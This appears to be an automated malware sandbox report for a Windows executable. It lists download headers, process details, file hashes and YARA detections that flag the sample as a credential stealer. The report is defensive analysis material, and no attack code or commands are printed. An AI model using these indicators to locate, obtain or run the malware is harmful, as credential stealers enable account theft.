                                                                                                                                                                                                                                                                        Date: Mon, 23 Dec 2024 06:26:51 GMT
                                                                                                                                                                                                                                                                        Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                                                                                                                                        ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                        x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                                                                                                                                        Content-Length: 1325507
                                                                                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                                                                                        Connection: close



                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                        Start time:01:26:17
                                                                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\TmmiCE5Ulm.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\TmmiCE5Ulm.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x6f0000
                                                                                                                                                                                                                                                                        File size:2'934'784 bytes
                                                                                                                                                                                                                                                                        MD5 hash:39A156657BE03CC94D69874B25836B8C
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2228599565.000000000118B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2231964807.0000000001154000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2232123533.0000000001154000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2231739674.0000000001154000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                        Start time:01:26:52
                                                                                                                                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 1924
                                                                                                                                                                                                                                                                        Imagebase:0xd0000
                                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000003.2231739674.0000000001128000.00000004.00000020.00020000.00000000.sdmp, Offset: 01128000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_1128000_TmmiCE5Ulm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 7
                                                                                                                                                                                                                                                                          • API String ID: 0-1790921346
                                                                                                                                                                                                                                                                          • Opcode ID: 95d08eacc1ca456e1a40866b820ab41bf89172a5daafb04f11610a251a89bc53
                                                                                                                                                                                                                                                                          • Instruction ID: f990719c224896e3d8923f55f9bb94d293a9e34da59bcd63fa1d40de56d64aa4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95d08eacc1ca456e1a40866b820ab41bf89172a5daafb04f11610a251a89bc53
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A012AD5A80D6C11EE317873468A62E4BFB09E0F23D77E06CEC8D18E4B7E256451BC792
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000003.2334229101.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, Offset: 011A6000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_11a6000_TmmiCE5Ulm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 6a11d567ed3c686ca955550fa17149172ea5afb458d062eacb59cd51adc63c12
                                                                                                                                                                                                                                                                          • Instruction ID: 6a8940c5955fe289d9caa18d3b1f4bb57af20e7ef437cf8330d7aaf34ee41558
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a11d567ed3c686ca955550fa17149172ea5afb458d062eacb59cd51adc63c12
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4721FF7205A3C1AFCB52DF38C9D1A833F61AF4732474A82D8E4805E047D328A623CB92